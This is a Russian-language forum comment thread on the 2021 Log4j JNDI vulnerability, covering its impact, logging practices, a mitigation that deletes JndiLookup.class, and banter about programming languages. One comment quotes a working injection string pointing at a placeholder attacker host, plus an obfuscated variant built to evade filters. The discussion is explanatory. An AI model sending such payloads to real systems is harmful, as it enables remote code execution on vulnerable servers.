|
2.5, Аноним (5), 10:40, 15/12/2021 [^] [^^] [^^^] [ответить]
| –7 +/– |
> Initial release January 8, 2001; 20 years ago
Диды по-другому не могли, постоянно выдумывали какие-то "прикольные штуки" типа например IP-адреса, в котором вместо десятичных чисел какие-то другие. Вот и тут диды решили добавить "фичу".
| |
|
3.25, Аноним (25), 11:33, 15/12/2021 [^] [^^] [^^^] [ответить]
| +14 +/– |
> Диды по-другому не могли, постоянно выдумывали какие-то "прикольные штуки" типа...
Диды писали и пушут на Си.
А джаверы - это растоманы v1.0, как и те, которые придумали IPv6.
Диды уже в те времена смотрели на них искоса.
| |
|
4.34, Аноним (5), 12:10, 15/12/2021 [^] [^^] [^^^] [ответить]
| –11 +/– |
> Диды писали и пушут на Си.
Ой ли? Традиционным языком дидов является пердл со страшными writeonly-регекспами. Вот и в этой cve чувствуется любовь дидов к прикольным)))) магическим))) строкам.
| |
|
5.51, Аноним (51), 13:00, 15/12/2021 [^] [^^] [^^^] [ответить]
| +7 +/– |
Ларри слабал perl в 1987 году
И Ларри, к сведению, лингвист. Делал для себя костылик, для применения в конкретном месте.
| |
5.84, Аноним (25), 15:58, 15/12/2021 [^] [^^] [^^^] [ответить]
| +2 +/– |
> Ой ли? Традиционным языком дидов является пердл со страшными writeonly-регекспами.
Я сам из дидов, но в пердл толком даже не умею. В скриптовых языках мне вообще всегда REXX больше всего нравился. Но сейчас уже мало дидов осталось, которые умеют в REXX.
| |
|
|
7.118, keydon (ok), 18:50, 17/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
Тоже скучаю, для скриптов удобнее питона, гораздо более читаемо чем баш, довольно лаконичен и не особо прожорлив.
| |
|
|
|
4.52, Аноним (51), 13:04, 15/12/2021 [^] [^^] [^^^] [ответить]
| +1 +/– |
>> Диды уже в те времена смотрели на них искоса.
Целевая аудитория java была - "для кого С++ слишком сложно". Можно сканы журналов ещё найти с оракловым маркетингом.
Смотрели на них, как на убогих
| |
|
|
6.74, YetAnotherOnanym (ok), 14:56, 15/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
Ооо, даааа... Сам читал интервью с МакНили, которое кто-то вывесил на доске объявлений нашего мехмата, ещё в девяносто-хрен-знает-каком году. Прямо такие дифирамбы жабе пел, что куды ж там.
| |
6.108, Аноним (51), 22:53, 15/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
>> Sun же, или уже забыли.
Ох ты ж... Да, слиплись в памяти в одно.
| |
|
5.75, Аноним (1), 14:59, 15/12/2021 [^] [^^] [^^^] [ответить]
| –3 +/– |
> Целевая аудитория java была - "для кого С++ слишком сложно"
Эм, и что в нём сложного? ЯП ВУ же. Под вопросом только читабельность кода из под клавиатуры особых "умельцев", это лично меня от него отталкивало всегда.
| |
|
6.94, DeadMustdie (??), 19:30, 15/12/2021 [^] [^^] [^^^] [ответить]
| +2 +/– |
> Эм, и что в нём сложного?
Метапрограммирование в целом и шаблоны в частности.
Множественное наследование классов.
Переопределение операторов, особенно в связке с шаблонами.
Все перечисленные выше инструменты крайне полезны, но притом довольно сложны в нетривиальных случаях.
| |
|
5.99, ms is piece of s (?), 20:26, 15/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
Один известный персонаж с усиками тоже имел привычку смотреть на некоторых как на убогих.
Тут дело не в ЯП, а в том, что "соль земли" отказывает себе в психологической помощи со стороны специалистов.
| |
|
4.123, Аноним (-), 12:01, 23/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
> Диды писали и пушут на Си.
От которых жабисты и научились в format vuln. Догнали и перегнали, акселерация.
| |
|
3.66, Аноним (66), 14:08, 15/12/2021 [^] [^^] [^^^] [ответить]
| +5 +/– |
Благодаря такому формату IP до сих пор нет Великого Российского Фаервола, потому что Шигорин так и не смог объяснить ФСБшникам что такое IP адрес. Деды знали что делали.
| |
|
4.89, X86 (ok), 17:53, 15/12/2021 [^] [^^] [^^^] [ответить]
| –1 +/– |
Зато есть великий американский файрволл, и вот что с ним делать не знает никто.
| |
|
|
2.90, Kuromi (ok), 18:20, 15/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
Не, просто починили не коренную проблему, а залатали именно ту дырку на которую указали белые шапки. То что рядом еще россыпь и небольшая корректировка атаки позволяет снова бить в туже коренную уязвимость - "пожли пдечами".
| |
|
1.7, Аноним (7), 10:43, 15/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
| –20 +/– |
Надоели!!!! Log4j2 как сам, так и опасный контекст из vulnerability issue, использует полтора программиста на этой планете. Крики такие, как будто это реальная проблема. Похоже на откровенную попытку слива Java как технологии.
| |
|
2.9, Аноним (9), 10:55, 15/12/2021 [^] [^^] [^^^] [ответить]
| +8 +/– |
Как соотносится "использует полтора программиста" и подтверждённое проявление уязвимости в продуктах GitHub, Docker, Oracle, vmWare, Broadcom и Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, Intel, NATS, Trend Micro, Aruba Networks, Microsoft, Siemens и Rockwell?
Это одна из самых опасных уязвимостей за последние лет 5, из-за того, что затрагивает кучу банковского, телекоммуникационного, корпоративного и промышленного софта. И это только начало, дальше можно ждать волну supply chain атак после взлома инфраструктур производителей.
| |
|
3.11, Аноним (7), 11:01, 15/12/2021 [^] [^^] [^^^] [ответить]
| –3 +/– |
> Как соотносится "использует полтора программиста" и подтверждённое проявление уязвимости в продуктах GitHub, Docker, Oracle, vmWare, Broadcom и Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, Intel, NATS, Trend Micro, Aruba Networks, Microsoft, Siemens и Rockwell?
Фактом наличия в зависимостях проектов. То есть, никак, по факту.
| |
|
4.12, полураспад (?), 11:05, 15/12/2021 [^] [^^] [^^^] [ответить]
| +1 +/– |
в нормальном коде не выводятся параметры приходящие от пользователя в лог, плюс это проверка давно существует в анализаторах безопастности, они показывают где параметры из запросов логируются в лог
| |
|
5.14, Аноним (13), 11:11, 15/12/2021 [^] [^^] [^^^] [ответить]
| +4 +/– |
Выходит "нормальный" по вашим представлениям код в корпоративной среде не встречается. Плюс на практике было показано как уязвимость работала в системах Amazon, Microsoft и многих других. У них "анализаторы безопасности" тоже какие-то неправильные?
К чему в таком случае вся эта ремарка?
| |
|
6.93, Аноньимъ (ok), 18:43, 15/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
>Выходит "нормальный" по вашим представлениям код в корпоративной среде не встречается.
А ведь он прав.
| |
|
5.18, Аноним (18), 11:20, 15/12/2021 [^] [^^] [^^^] [ответить]
| +2 +/– |
Скажите это тем, кто пишет в лог значение User Agent, X-Forward-For и прочих заголовков. В логи такое пишут повсеместно.
| |
5.28, Фняк (?), 11:55, 15/12/2021 [^] [^^] [^^^] [ответить]
| +4 +/– |
Это почему? Вот вызвали функцию с какими-то параметрами. Функция проверила параметры и какие-то из них не валидны. Перед тем как вернуть соответствующий код возврата она пишет в лог сообщение о том что вот не получилось выполнить работу потому во то условие не выполняется при вот этих входных параметрах. Пишет это она для админа на случай если к нему придут с вопросами «а почему не работает?» функция сама по себе понятия не имеет откуда переданные параметры взялись, от пользователя или ещё откуда
| |
5.30, пох. (?), 11:58, 15/12/2021 [^] [^^] [^^^] [ответить]
| +8 +/– |
точно, нормальный код логает в лог только ok и error. Предоставляя гадать, что именно было ok и чего error.
Дайте угадаю - вы разработчик на модном языке?
| |
5.76, quantic (?), 15:06, 15/12/2021 [^] [^^] [^^^] [ответить]
| +1 +/– |
Проблема не в том что значения от пользователя выводятся в лог, проблема в том что log4j их не фильтрует. Это их факап.
| |
5.100, john_erohin (?), 20:28, 15/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
> в нормальном коде не выводятся параметры приходящие от пользователя в лог,
врать не надо. навскидку:
apache выводит referer и user-agent (оба от пользователя) в combined log.
bind выводит попытки рекурсии от обнаглевших "сканеров безопастности" в лог.
что, у них ненормальный код ?
| |
5.102, Аноним (102), 20:45, 15/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
Только эксперты с opennet знают как правильно писать код. Жаль что почему-то не пишут
| |
|
4.20, Аноним (18), 11:22, 15/12/2021 [^] [^^] [^^^] [ответить]
| +2 +/– |
Это компании которые _сами_ подтвердили проявление уязвимости Log4j в своих продуктах. Логи с отражением User Agent по умолчанию ведут почти все корпоративные системы.
| |
|
5.31, Аноним (-), 11:58, 15/12/2021 [^] [^^] [^^^] [ответить]
| +2 +/– |
1) Далеко не все делают бесконтрольную подстановку данных, принятых от пользователя, непосредственно в ".. {}.." лога.
2) Не самый распространённый случай использования JNDI внутри организации.
3) Неплохо бы иметь доступ к ресурсам JNDI из сети, где расположен сервис.
А теперь вопрос - скольких компаний это реально касается до такой степени, чтобы кричать "ужас-ужас"?
| |
|
6.40, Аноним (40), 12:36, 15/12/2021 [^] [^^] [^^^] [ответить]
| +3 +/– |
> не все делают бесконтрольную подстановку данных, принятых от пользователя, непосредственно в ".. {}.." лога.
А как надо правильно логировать http запрос от пользователя?
| |
|
7.42, Аноним (7), 12:45, 15/12/2021 [^] [^^] [^^^] [ответить]
| +2 +/– |
Любым способом, не подразумевающим подстановку поля, полученного от пользователя в конструкцию "{}". Вроде не сложно такой подобрать
PS: если руководствоваться здравым смыслом при написании программы, то случаев, когда значения HTTP-заголовков подставляются в log4j непосредственно, не так уж и много. И вообще, не приходит в голову, когда это может понадобиться.
| |
|
8.73, Аноним (40), 14:51, 15/12/2021 [^] [^^] [^^^] [ответить] | +/– | Если я подставлю допустим объект, содержащий тело и мапу заголовков - это нормал... текст свёрнут, показать | |
|
7.77, YetAnotherOnanym (ok), 15:07, 15/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
> А как надо правильно логировать http запрос от пользователя?
Дословно, с предварительным обеззараживанием, обесклычиванием, убеганием и прочими аналогичными процедурами.
| |
|
6.60, Аноним (60), 13:40, 15/12/2021 [^] [^^] [^^^] [ответить]
| +1 +/– |
Достаточно любой подстановки внешних данных в лог, не важно как они переданы через подстановку или голой строкой. Главная проблема в этой узявимости, что Log4j сам разберёт "${..}" в выводимой строке, никаких особых подстановок для этого делать не нужно. Т.е. написал в коде "logger.info(extvar);" и можно хакнуть, если есть возможность переть в extvar что-то типа "${jndi:ldap://attacker.com/a}" или "${env:FOO:-j}ndi:${lower:L}da${lower:P}", как в примере в новости.
| |
|
7.72, Аноним (7), 14:46, 15/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
Как хорошо, что ничего кроме slf4j/logback у нас не используется....
| |
|
|
|
|
3.29, пох. (?), 11:56, 15/12/2021 [^] [^^] [^^^] [ответить]
| +4 +/– |
Причем жопа в том что это как раз то о чем многажды говорили большевики - пытаясь заставить формошлепов использовать библиотеки операционной системы, а не намертво слинковать прожект с кучей мусора со всего интернета, непременнейше - наираспоследней версии на момент линковки.
Но это немодно, немолодежно и в модных-современных язычках вообще неосуществимо.
Поэтому в отличие от вполне тоже опасных и реальных уязвимостей в той же openssl - нельзя исправить большую часть проблем банально обновив "открытую" библиотеку. Будем сидеть и ждать пока орацле, броацом и амазоны с жуниперами разродятся - по каждому из миллиона своих подeлий отдельно.
| |
|
4.69, макпыф (ok), 14:21, 15/12/2021 [^] [^^] [^^^] [ответить]
| +1 +/– |
просто системные либы могут быть разные. А модно молодежным програмистам хочется подключить 100500 либ, а вот поддерживать это все - нет. Потому просто бандлят единственно верную версию и статически/странным образом прибивают гвоздями. Обновляется это все конечно только в случае пинка под зад.
Потому мне приходится 100500 часов компилить забандленные в пакет либы (причем многолетней выдержки), когда я пару часов назад уже скомпилил их (причем актуальной версии). Можно конечно пытаться патчить все это дерьмо, на так как все заточенно под единственно верную версию - может быть очень много геморроя.
Итого: все это дерьмо с "релизами" где обновленна какая нибудь nss/log4j и многочасовая компиляция ни пойми чего.
| |
|
|
|
1.15, Аноним (16), 11:13, 15/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
| –8 +/– |
Где же тысячи глаз попенсорса??? которые должны находить каждую уазвимость за наносек после коммита???
| |
|
|
|
4.22, eugener (ok), 11:22, 15/12/2021 [^] [^^] [^^^] [ответить]
| +3 +/– |
Тогда это считалось фичей. Круто же, лукапить строчки из лога. А эти хакеры всё опошлили.
| |
|
3.96, DeadMustdie (??), 19:38, 15/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
> Ну так вот и нашли.
Вроде нашёл инженер из Алибабы, в процессе сопровождения внутренностей алибабовских сервисов.
Ни разу не энтузиаст-бессребреник.
| |
|
|
1.35, Анатолий (??), 12:17, 15/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
| +3 +/– |
Простое решение уязвимости в любой версии - отказ от JNDI.
в библиотеке log4j-core-x.x.x.jar
удалить класс
/org/apache/logging/log4j/core/lookup/JndiLookup.class
и тогда конструкция ${jndi:...} просто не обрабатывается
| |
|
2.36, Аноним (5), 12:21, 15/12/2021 [^] [^^] [^^^] [ответить]
| +6 +/– |
ща погодь, я на продакшоне сразу. Скинь плз на почту этот jar с удаленным классом, тимлид над душой стоит, целый банк уязвим как-никак
| |
|
3.43, Анатолий (??), 12:46, 15/12/2021 [^] [^^] [^^^] [ответить]
| +4 +/– |
у меня старый log4j версии 2.4
переход на 2.15.0 выл связан с несколькими несовместимости (используется runtime настройка логгеров)
Сделал log4j-core-2.4.2.jar залил в свой бинарный репозиторий (закрытый) и подключил его.
С любым log4j-core-х.х.х.jar можно проделать то же самое
еще раз расширенно: в библиотеке уделить класс
/org/apache/logging/log4j/core/lookup/JndiLookup.class
при загрузке системы инициализация библиотеки не найдет этот класс в выдаст в лог предупреждение:
JNDI lookup class is not available because this JRE does not support JNDI. JNDI string lookups will not be available, continuing configuration.
При этом все будет работать, но уязвимости не будет за неимением класса, в котором и была уязвимость
| |
3.104, ms is piece of s (?), 20:57, 15/12/2021 [^] [^^] [^^^] [ответить]
| +5 +/– |
На, лови: log4j-core-2.4.2.jar.exe
Короче, это пофикшеный логфорджи, плюс он автоматически ищет другие либы логфорджи во всех каталогах ос и тоже их фиксит от уязвимости.
Отправь пожалуйста всем своим знакомым, скорее всего у них тоже где-нибудь да есть уязвимая версия.
| |
|
4.117, тигар.логиниться.лень (?), 11:58, 17/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
срочно переделай. распространять нужно в виде даунлоадера правильной, патченной, JARки. Этим ты сможешь обеспечить страдальцам-рукозадам всегда свежую, правильную, версию.
| |
|
|
|
1.67, Аноним (67), 14:19, 15/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
А ведь Java безопасно работает с памятью, а всё равно дыра как такое может быть?
| |
|
2.79, cheater (?), 15:14, 15/12/2021 [^] [^^] [^^^] [ответить]
| +6 +/– |
При чем здесь память, это ошибка поведения - eval произвольных данных.
| |
|
|
4.87, Аноним (87), 17:07, 15/12/2021 [^] [^^] [^^^] [ответить]
| –2 +/– |
> И это - будущее раста.
Это прошлое раста. В C++ этой проблемы уже давным давно нет.
| |
|
5.106, Аноним (87), 21:44, 15/12/2021 [^] [^^] [^^^] [ответить]
| –2 +/– |
Более того добавлю. В С++ все эти проблемы которые вы тут вешаете на С были решены настолько давно, что про раст никто даже не думал. Так что забейте. Читайте книжки по C++ и будьте счастливы, удивитесь тому что всех этих проблем в C++ давным давно нет.
| |
|
6.116, _ (??), 19:41, 16/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
Ну да - если плюсы не юзать - плюсопроблем и нет ... Л-логика :)
Для дюбого Ёзыга подходит. А они все - ***но, потому как нет нет большой красной кноки "Сделать ЗБС!" ни в одном :(
:-D
| |
|
|
|
|
2.83, gogo (?), 15:46, 15/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
Этого не может быть.
Это заговор, как китайский короновирус.
| |
|
3.109, Аноним (109), 06:39, 16/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
> люди сперва распарсевают смысл написанного
Да ладно тебе. Ну кто таким заниматься будет?
| |
|
|
1.98, Онаним (?), 20:23, 15/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
| +7 +/– |
Ну всё, сейчас будут вместо того, чтобы eval убрать, городить кучу валидаций, и в итоге эти валидации всё равно будут обходить.
| |
|
2.120, Аноним (82), 02:56, 18/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
В любой валидации будет дыра, ведь код пишут прогосеки с растаманоподобными мозгами.
| |
|
1.107, anonymous (??), 22:48, 15/12/2021 [ответить] [﹢﹢﹢] [ · · · ]
| +3 +/– |
А ведь это даже не сишечка с переполнением буфера. А вполне кошерный менеджмент памяти со сборкой мусора. Может дело не в них?
| |
|
|
3.115, _ (??), 19:39, 16/12/2021 [^] [^^] [^^^] [ответить]
| +/– |
сейчас где то умер котё^W ржавчик. Как же так то?! ржавчина "нэ спасэ?!" ... какая боль ... ;-D
| |
|
|
|